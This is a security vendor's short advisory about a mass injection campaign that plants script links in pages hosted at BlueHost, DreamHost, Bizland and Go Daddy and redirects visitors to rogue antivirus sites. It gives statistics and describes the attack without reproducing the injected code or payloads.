Rogue AV Injection Campaign Targeting Web Hosting Networks
Websense® Security Labs™ ThreatSeeker™ Network has discovered that a mass injection attack targeting Web hosting networks is spreading in the wild. Users visiting these compromised sites will be redirected to rogue AV sites.
Websense ThreatSeeker Network detected this large-scale break out of the campaign recently. The targets are four well-known Web hosting providers: BlueHost, DreamHost, Bizland and Go Daddy. According to our statistics, approximately 38% of the compromised sites in this campaign are hosting in Bluehost, and nearly 97% of the sites compromised by the attack are from the above four Web hosting companies.
This shows the number of compromised sites we have monitored in the last week:
Below is the distribution ratio of hacked Web hosting companies:
The cybercriminals use similar injections to insert a PHP link in a script tag at the bottom of each compromised page, as shown below:
The major injected URLs used in the attack are:
Most of the above sites were registered between May and July by the same person using two free mailboxes. From the payloads we found that they all redirected to rogue AV pages which use .co.cc as their top-level domain.
Below is one of the payloads from whereisdudescars.com:
It will lead users to rogue AV sites and force them to download their fake antivirus software, which has low coverage by Virustotal detection.
Websense TRITON Advanced Classification Engine (ACE) is protecting customers against this attack. We will continue to monitor and update it.